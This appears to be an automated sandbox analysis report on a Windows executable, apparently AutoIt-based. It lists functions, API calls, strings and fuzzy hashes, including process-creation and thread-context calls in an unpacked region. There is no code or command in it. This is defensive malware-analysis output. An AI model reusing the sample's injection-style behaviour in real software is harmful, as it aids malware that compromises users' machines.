Associated: 00000000.00000002.2038400053.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_pismo1A 12.jbxd

Similarity

API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
String ID: #$0$AutoIt v3
API String ID: 423443420-4155596026
Opcode ID: 8a965fdbb1f148ca685559a4dd697c5323c4ee4739c7a8339a387adaf2777f11
Instruction ID: 8ba7275416eb54a887b87f87cb720034fed051115832802e736bdaeb63af6f5b
Opcode Fuzzy Hash: 8a965fdbb1f148ca685559a4dd697c5323c4ee4739c7a8339a387adaf2777f11
Instruction Fuzzy Hash: C1214C71E00314ABEB119FA9EC55B997FB4FB08B90F40C01AF508A66A0D3B90984CF98

Function 006AB710 Relevance: 16.3, APIs: 1, Strings: 8, Instructions: 587COMMON

Download Yara Rule

APIs

__Init_thread_footer.LIBCMT ref: 006ABB4E

Strings

p#w, xrefs: 006F024F
p#w, xrefs: 006ABA72
p#w, xrefs: 006ABB6B
x#w, xrefs: 006F0168
p#w, xrefs: 006F0263
x#w, xrefs: 006F0207
p%w, xrefs: 006ABB32
p%w, xrefs: 006AB8DC

Memory Dump Source

Source File: 00000000.00000002.2033680614.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000000.00000002.2033562765.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035195871.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2038400053.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_pismo1A 12.jbxd

Similarity

API ID: Init_thread_footer
String ID: p#w$p#w$p#w$p#w$p%w$p%w$x#w$x#w
API String ID: 1385522511-775303013
Opcode ID: e17f188f3dd7dad8b8ead9cd5aa45bb4771e0fa766ee14efc779bbfe697f24f5
Instruction ID: 31d0066b7868da532acf1589b380a968626ce0e7fb72c6da0af96e34fb701d56
Opcode Fuzzy Hash: e17f188f3dd7dad8b8ead9cd5aa45bb4771e0fa766ee14efc779bbfe697f24f5
Instruction Fuzzy Hash: 8B32AE71A00209DFDB20EF54C894ABAB7B7EF46350F148059EA15AB353D778AD82CF51

Function 006A3170 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 145
windowtimeregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DefWindowProcW.USER32(?,?,?,?,?,?,?,?,?,006A316A,?,?), ref: 006A31D8
KillTimer.USER32(?,00000001,?,?,?,?,?,006A316A,?,?), ref: 006A3204
SetTimer.USER32(?,00000001,000002EE,00000000), ref: 006A3227
RegisterWindowMessageW.USER32(TaskbarCreated,?,?,?,?,?,006A316A,?,?), ref: 006A3232
CreatePopupMenu.USER32 ref: 006A3246
PostQuitMessage.USER32(00000000), ref: 006A3267

Strings

TaskbarCreated, xrefs: 006A322D

Memory Dump Source

Source File: 00000000.00000002.2033680614.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000000.00000002.2033562765.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035195871.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2038400053.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_pismo1A 12.jbxd

Similarity

API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
String ID: TaskbarCreated
API String ID: 129472671-2362178303
Opcode ID: 06febc85048f0d9c8889f1a47e92e56ec9ca8ee28a3b49bf36694f1431c95077
Instruction ID: a8e8d26ab2283f7065e72dd2f01f83b1d1ec79a3575d8864015090e58de77b82
Opcode Fuzzy Hash: 06febc85048f0d9c8889f1a47e92e56ec9ca8ee28a3b49bf36694f1431c95077
Instruction Fuzzy Hash: 41413A31240264ABEB153B7C9C1EBB9365FEB47380F448125FA0696391C7699F428FA9

Function 006ADFD0 Relevance: 15.4, APIs: 2, Strings: 6, Instructions: 1414COMMON

Download Yara Rule

Strings

D%w, xrefs: 006AE1E0
Variable must be of type 'Object'., xrefs: 006F32B7
D%wD%w, xrefs: 006AE27E
D%w, xrefs: 006F2FDA
D%w, xrefs: 006AE4B1
D%w, xrefs: 006F302D

Memory Dump Source

Source File: 00000000.00000002.2033680614.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000000.00000002.2033562765.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035195871.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2038400053.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_pismo1A 12.jbxd

Similarity

API ID:
String ID: D%w$D%w$D%w$D%w$D%wD%w$Variable must be of type 'Object'.
API String ID: 0-3922967373
Opcode ID: d79244aca99678263395158b88755b8d095cfeb4eb77a14825fb13d8f8569d46
Instruction ID: ffeef7e262fbe13ef093022b089117fe5b5f5ae29ac576b71f656bc03060d99e
Opcode Fuzzy Hash: d79244aca99678263395158b88755b8d095cfeb4eb77a14825fb13d8f8569d46
Instruction Fuzzy Hash: 9AC26E71A00215CFCB24EF58C880AADB7B2FF4A310F248569E915AB391D376ED82CF55

Function 010C25C0 Relevance: 10.7, APIs: 7, Instructions: 239
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 010C2691
VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 010C28B7

Memory Dump Source

Source File: 00000000.00000002.2039286629.00000000010C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10c0000_pismo1A 12.jbxd

Similarity

API ID: CreateFileFreeVirtual
String ID:
API String ID: 204039940-0
Opcode ID: ed516440ab75e0c1ded8a7b1870b24392b753ad5cf7d4aa929dd61e32643855c
Instruction ID: 4b71fa70d13ee66b88356a0123bd8a01f13a10e4b849c20dc017d48c9548f56d
Opcode Fuzzy Hash: ed516440ab75e0c1ded8a7b1870b24392b753ad5cf7d4aa929dd61e32643855c
Instruction Fuzzy Hash: 90A11974E01209EBDB14CFA4C994BEEBBB5BF48704F20819DE641BB280D7759A85CF64

Function 006A2C63 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 006A2C91
CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 006A2CB2
ShowWindow.USER32(00000000,?,?,?,?,?,?,006A1CAD,?), ref: 006A2CC6
ShowWindow.USER32(00000000,?,?,?,?,?,?,006A1CAD,?), ref: 006A2CCF

Strings

AutoIt v3, xrefs: 006A2C89, 006A2C8E, 006A2C8F
edit, xrefs: 006A2CAC

Memory Dump Source

Source File: 00000000.00000002.2033680614.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000000.00000002.2033562765.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035195871.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2038400053.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_pismo1A 12.jbxd

Similarity

API ID: Window$CreateShow
String ID: AutoIt v3$edit
API String ID: 1584632944-3779509399
Opcode ID: 7d00eee0509e142176854120279c4be3ea08b07f1592a5916968099c553644d7
Instruction ID: 3669ee9fb0b0016539ebfa53d798443d640edb681a386b90643bb3a8f0e52219
Opcode Fuzzy Hash: 7d00eee0509e142176854120279c4be3ea08b07f1592a5916968099c553644d7
Instruction Fuzzy Hash: 0CF0DA756503947AEB31172BAC09E773EBDD7C6F90F41806AF908A25A0C6691890DBB8

Function 010C23B0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 138
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 010C22A0: Sleep.KERNELBASE(000001F4), ref: 010C22B1

CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 010C24B6

Strings

UJSJB8X4H5ZQR9YU, xrefs: 010C2519, 010C251C

Memory Dump Source

Source File: 00000000.00000002.2039286629.00000000010C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10c0000_pismo1A 12.jbxd

Similarity

API ID: CreateFileSleep
String ID: UJSJB8X4H5ZQR9YU
API String ID: 2694422964-714822084
Opcode ID: a77bdcb07702319ec585e6b1f1a3cb133ec7d10a1a1fe0bbca49ffd30f4860d4
Instruction ID: 02fbfd5fe1bb65f96d05ac67ef0afed1ca57a1079dcad70c501e816ba2719a61
Opcode Fuzzy Hash: a77bdcb07702319ec585e6b1f1a3cb133ec7d10a1a1fe0bbca49ffd30f4860d4
Instruction Fuzzy Hash: FD516E30D14249EAEF11DBA4C818BEFBBB9AF55700F004199E649BB2C0DB791B45CBA5

Function 00712947 Relevance: 7.8, APIs: 5, Instructions: 313
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00712C05
DeleteFileW.KERNEL32(?), ref: 00712C87
CopyFileW.KERNELBASE(?,?,00000000,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00712C9D
DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00712CAE
DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00712CC0

Memory Dump Source

Source File: 00000000.00000002.2033680614.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000000.00000002.2033562765.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035195871.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2038400053.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_pismo1A 12.jbxd

Similarity

API ID: File$Delete$Copy
String ID:
API String ID: 3226157194-0
Opcode ID: e7bfcea76832f998b7773808d0adad9659ca2ccec7dec95dc667a59f6f0d0484
Instruction ID: cc46a9c22739739b5abb486725945e7a3c1014e337fc8b54c3161ac9e504f3ea
Opcode Fuzzy Hash: e7bfcea76832f998b7773808d0adad9659ca2ccec7dec95dc667a59f6f0d0484
Instruction Fuzzy Hash: 87B16271900119ABDF11EFA4CC85EEE777DEF05350F1040AAF609E6182EA349E958FA4

Function 006D5AA9 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 186
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

JOj, xrefs: 006D5BA8, 006D5C6C

Memory Dump Source

Source File: 00000000.00000002.2033680614.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000000.00000002.2033562765.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035195871.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2038400053.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_pismo1A 12.jbxd

Similarity

API ID:
String ID: JOj
API String ID: 0-1489635976
Opcode ID: a906b44e9d5f2accd48c3a5788b20eab87234cbf0ff31ef1b00e9afe9125f880
Instruction ID: 89144d97bd16eed238273992dc78ebfb324f74592f393f54af0da76b7f3bfd63
Opcode Fuzzy Hash: a906b44e9d5f2accd48c3a5788b20eab87234cbf0ff31ef1b00e9afe9125f880
Instruction Fuzzy Hash: B851CC71D1060AABDB21AFA8C845FFEBBBAEF05310F14005FF406A7791D6758A02DB65

Function 006A3B1C Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,?,?,80000001,80000001,?,006A3B0F,SwapMouseButtons,00000004,?), ref: 006A3B40
RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,?,80000001,80000001,?,006A3B0F,SwapMouseButtons,00000004,?), ref: 006A3B61
RegCloseKey.KERNELBASE(00000000,?,?,?,80000001,80000001,?,006A3B0F,SwapMouseButtons,00000004,?), ref: 006A3B83

Strings

Control Panel\Mouse, xrefs: 006A3B3E

Memory Dump Source

Source File: 00000000.00000002.2033680614.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000000.00000002.2033562765.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035195871.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2038400053.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_pismo1A 12.jbxd

Similarity

API ID: CloseOpenQueryValue
String ID: Control Panel\Mouse
API String ID: 3677997916-824357125
Opcode ID: 920c484920e910c027885b18d45bcea7972e6b0605e33e78b2edc87b0fb38aef
Instruction ID: c278095823588984c3545b34803c642b5e185ef8933137e974e1e6d8679d82fb
Opcode Fuzzy Hash: 920c484920e910c027885b18d45bcea7972e6b0605e33e78b2edc87b0fb38aef
Instruction Fuzzy Hash: 6B115AB5510218FFDB219FA4DC84AEEB7BAEF21740B108459B801E7210E3319E409B64

Function 010C12A0 Relevance: 6.7, APIs: 4, Instructions: 720processthreadCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNELBASE(?,00000000), ref: 010C1A5B
Wow64GetThreadContext.KERNEL32(?,00010007), ref: 010C1AF1
ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 010C1B13

Memory Dump Source

Source File: 00000000.00000002.2039286629.00000000010C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10c0000_pismo1A 12.jbxd

Similarity

API ID: Process$ContextCreateMemoryReadThreadWow64
String ID:
API String ID: 2438371351-0
Opcode ID: 4a62210935fbc19ac52c28b7856ac9112c9a9e608a38d15f0a7da1a89c903d0f
Instruction ID: e0842700c219f3122914877daa5bec47ac63ee9944b6664951a34a6f7d1fdb4b
Opcode Fuzzy Hash: 4a62210935fbc19ac52c28b7856ac9112c9a9e608a38d15f0a7da1a89c903d0f
Instruction Fuzzy Hash: 81620930A14258DBEB24DBA4C850BDEB772EF58700F1091A9D20DEB391E7759E81CF59

Function 006A2DE3 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 64COMMON

Download Yara Rule

APIs

GetOpenFileNameW.COMDLG32(?), ref: 006E2C8C

Part of subcall function 006A3AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,006A3A97,?,?,006A2E7F,?,?,?,00000000), ref: 006A3AC2

Part of subcall function 006A2DA5: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 006A2DC4

Strings

`ev, xrefs: 006E2C85
X, xrefs: 006E2C5A

Memory Dump Source

Source File: 00000000.00000002.2033680614.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000000.00000002.2033562765.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035195871.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2038400053.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_pismo1A 12.jbxd

Similarity

API ID: Name$Path$FileFullLongOpen
String ID: X$`ev
API String ID: 779396738-137022389
Opcode ID: d32de77a6666c188ebe091fc969d945170d9f81737e6985bc958103aa5a33940
Instruction ID: 412f0e8ff1651df7d22665722c799b177f948582de0ee5dd77cd4f4f91568baf
Opcode Fuzzy Hash: d32de77a6666c188ebe091fc969d945170d9f81737e6985bc958103aa5a33940
Instruction Fuzzy Hash: 8321C671A002989BDB41EF98C805BEE7BFEAF49304F00805DE505B7241DFB85A898FA5

Function 006BFDDB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 43COMMON

Download Yara Rule

APIs

__CxxThrowException@8.LIBVCRUNTIME ref: 006C0668

Part of subcall function 006C32A4: RaiseException.KERNEL32(?,?,?,006C068A,?,00771444,?,?,?,?,?,?,006C068A,006A1129,00768738,006A1129), ref: 006C3304

__CxxThrowException@8.LIBVCRUNTIME ref: 006C0685

Strings

Unknown exception, xrefs: 006C0692

Memory Dump Source

Source File: 00000000.00000002.2033680614.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000000.00000002.2033562765.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035195871.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2038400053.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_pismo1A 12.jbxd

Similarity

API ID: Exception@8Throw$ExceptionRaise
String ID: Unknown exception
API String ID: 3476068407-410509341
Opcode ID: 01c7c8dd6c0d08cbcad42ea49fdfa2aa898cf4c54da56d0f5f50bc1985bec301
Instruction ID: a1702f1184182b609d58283a6e73d5cfd1780fdd8833ab9c8d9f41e0c6814faf
Opcode Fuzzy Hash: 01c7c8dd6c0d08cbcad42ea49fdfa2aa898cf4c54da56d0f5f50bc1985bec301
Instruction Fuzzy Hash: B5F0F474900208B78F40BAA4DC46EED776EDE00300B60413DB814C16A2EF71DB568684

Function 00713017 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 18COMMON

Download Yara Rule

APIs

GetTempPathW.KERNEL32(00000104,?,00000001), ref: 0071302F
GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 00713044

Strings

aut, xrefs: 00713038

Memory Dump Source

Source File: 00000000.00000002.2033680614.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000000.00000002.2033562765.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035195871.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2038400053.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_pismo1A 12.jbxd

Similarity

API ID: Temp$FileNamePath
String ID: aut
API String ID: 3285503233-3010740371
Opcode ID: dd7e8893bbe8f651c8f45fd737fce027b20f8524c0caaf26900e22179a2930ea
Instruction ID: 8d380a8cbfcbf10de0ce1b07167216f253c52997878b15e6a74cee53ee1be31e
Opcode Fuzzy Hash: dd7e8893bbe8f651c8f45fd737fce027b20f8524c0caaf26900e22179a2930ea
Instruction Fuzzy Hash: D0D05B7250032467DA2097949C0DFC73A6CD704751F4042517A55E6091DAB49544CBD4

Function 00727F59 Relevance: 4.9, APIs: 3, Instructions: 430COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000000,00000067,000000FF,?,?,?), ref: 007282F5
TerminateProcess.KERNEL32(00000000), ref: 007282FC
FreeLibrary.KERNEL32(?,?,?,?), ref: 007284DD

Memory Dump Source

Source File: 00000000.00000002.2033680614.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000000.00000002.2033562765.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035195871.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2038400053.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_pismo1A 12.jbxd

Similarity

API ID: Process$CurrentFreeLibraryTerminate
String ID:
API String ID: 146820519-0
Opcode ID: 63f35cacfa41ceda9e05e91690dad8d93cce505d908866d309d0986a382feb29
Instruction ID: 035dd4d5ec4bf6e9eda1754c248b224f32457306463f3fbb3c3a272e7b5c84e5
Opcode Fuzzy Hash: 63f35cacfa41ceda9e05e91690dad8d93cce505d908866d309d0986a382feb29
Instruction Fuzzy Hash: E5127A71908351DFC764DF28C484B2ABBE1BF89314F04895DE8998B252DB35ED45CF92

Function 006A10F3 Relevance: 4.7, APIs: 3, Instructions: 153comCOMMON

Download Yara Rule

APIs

Part of subcall function 006A1BC3: MapVirtualKeyW.USER32(0000005B,00000000), ref: 006A1BF4
Part of subcall function 006A1BC3: MapVirtualKeyW.USER32(00000010,00000000), ref: 006A1BFC
Part of subcall function 006A1BC3: MapVirtualKeyW.USER32(000000A0,00000000), ref: 006A1C07
Part of subcall function 006A1BC3: MapVirtualKeyW.USER32(000000A1,00000000), ref: 006A1C12
Part of subcall function 006A1BC3: MapVirtualKeyW.USER32(00000011,00000000), ref: 006A1C1A
Part of subcall function 006A1BC3: MapVirtualKeyW.USER32(00000012,00000000), ref: 006A1C22

Part of subcall function 006A1B4A: RegisterWindowMessageW.USER32(00000004,?,006A12C4), ref: 006A1BA2

GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 006A136A
OleInitialize.OLE32 ref: 006A1388
CloseHandle.KERNEL32(00000000,00000000), ref: 006E24AB

Memory Dump Source

Source File: 00000000.00000002.2033680614.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000000.00000002.2033562765.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035195871.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2038400053.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_pismo1A 12.jbxd

Similarity

API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
String ID:
API String ID: 1986988660-0
Opcode ID: 97da3df5d39c263585457795d888215002f7812d1f365fe58e47637eb41dcaec
Instruction ID: ec5668439cf32dee72379ae872fbad6b6886944502d5e21ddaab597258f90f35
Opcode Fuzzy Hash: 97da3df5d39c263585457795d888215002f7812d1f365fe58e47637eb41dcaec
Instruction Fuzzy Hash: A4719BB49112408EC788EF7DA8566553AE5AB8A3D47D5C22E900EDB261EB3C48A0CF5D

Function 006A54C6 Relevance: 4.6, APIs: 3, Instructions: 103COMMON

Download Yara Rule

APIs

SetFilePointerEx.KERNELBASE(?,?,00000001,00000000,00000001,?,00000000), ref: 006A556D
SetFilePointerEx.KERNELBASE(?,00000000,00000000,?,00000001), ref: 006A557D

Memory Dump Source

Source File: 00000000.00000002.2033680614.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000000.00000002.2033562765.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035195871.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2038400053.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_pismo1A 12.jbxd

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: 4d3330734cbc54b88104283773e61fc2c6b7d050feb994abac5e4772fa65af47
Instruction ID: 35439e5aee49f476efd86289d0d2c47bcf707c7464900cedf4340cf7ccbe7cf0
Opcode Fuzzy Hash: 4d3330734cbc54b88104283773e61fc2c6b7d050feb994abac5e4772fa65af47
Instruction Fuzzy Hash: 09316C71A00A09EFDB14DF68C880B99B7B6FB48314F148229E91A97340D771FEA4CF90

Function 006D86AE Relevance: 4.6, APIs: 3, Instructions: 61COMMONLIBRARYCODE

Download Yara Rule

APIs

FindCloseChangeNotification.KERNELBASE(00000000,00000000,?,?,006D85CC,?,00768CC8,0000000C), ref: 006D8704
GetLastError.KERNEL32(?,006D85CC,?,00768CC8,0000000C), ref: 006D870E
__dosmaperr.LIBCMT ref: 006D8739

Memory Dump Source

Source File: 00000000.00000002.2033680614.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000000.00000002.2033562765.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035195871.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2038400053.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_pismo1A 12.jbxd

Similarity

API ID: ChangeCloseErrorFindLastNotification__dosmaperr
String ID:
API String ID: 490808831-0
Opcode ID: fc00fb261cb1937d8b8ea235d65455c3d8451f664250e25a08165bc29a5d8bb6
Instruction ID: 9fb5be4e376d257a5452d5b180af9014eb94e4a302a2f5a8be2c0903bcf72448
Opcode Fuzzy Hash: fc00fb261cb1937d8b8ea235d65455c3d8451f664250e25a08165bc29a5d8bb6
Instruction Fuzzy Hash: 58018232E041B02ED6656734584DBBE2B478B81774F36011FF8059B3D3DE64CC818294

Function 00712FD8 Relevance: 4.5, APIs: 3, Instructions: 27filetimeCOMMON

Download Yara Rule

APIs

CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,00000000,?,?,00712CD4,?,?,?,00000004,00000001), ref: 00712FF2
SetFileTime.KERNELBASE(00000000,?,00000000,?,?,00712CD4,?,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00713006
CloseHandle.KERNEL32(00000000,?,00712CD4,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 0071300D

Memory Dump Source

